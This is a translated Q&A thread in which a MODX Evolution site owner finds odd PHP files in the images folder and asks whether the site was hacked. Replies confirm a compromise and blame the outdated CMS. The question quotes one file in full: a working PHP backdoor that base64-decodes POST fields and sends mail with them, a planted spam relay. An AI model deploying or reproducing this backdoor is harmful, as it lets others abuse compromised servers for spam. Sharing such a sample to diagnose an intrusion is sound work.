MODX evo - это ошибки в папке с изображениями ресурсов?

В моих ресурсах modx -> изображения есть странные файлы php

введите здесь описание изображения

cklxt.php.php.php.php
cklxt.php.php.php.php.php

Если я открою их, код не будет связан с изображениями:

<?php 
$ixhpq = stripslashes(base64_decode($_POST['gqujwdb'])); 
$xuoh = stripslashes(base64_decode($_POST['maih'])); 
$iglrhrluhvqgr = stripslashes(base64_decode($_POST['mepouebon']));  
$yflalhugo = stripslashes(base64_decode($_POST['cdcftxzkyrg']));  
$nzcbxor = mail(stripslashes($ixhpq), stripslashes($xuoh), stripslashes($iglrhrluhvqgr), stripslashes($yflalhugo));
if($nzcbxor){echo 'nlewxnrsdqxow';} else {echo 'qhguq : ' . $nzcbxor;}

Есть еще много...

Эти файлы php должны быть там? Или это баги или сайт взломали?


php modx modx-evolution
person laukok    schedule 07.05.2017    source источник
comment
Я полагаю, вас взломали.   -  person u_mulder    schedule 07.05.2017
comment
@u_mulder Я так и думал! modx действительно плохое приложение!   -  person laukok    schedule 07.05.2017

Ответы (1)


arrow_upward
1
arrow_downward

Evolution CMS больше официально не поддерживается MODX. Еще в ноябре произошла серия неудачных взломов, и сообщество, ответственное за кодовую базу, не спешило реагировать. В конце концов, был выпущен патч, но вместе с ним были сотни других изменений кода. Существует множество временных решений для предотвращения таких взломов, но, возможно, лучше всего проконсультироваться с разработчиком эволюции, чтобы вернуть ваш сайт в нормальное состояние.

Я бы не стал винить приложение, так как ему более 11 лет, и у него всего около 12 CVE. Он просто устарел, не исправлялся и почти полвека был заменен Revolution.

person matdave    schedule 18.05.2017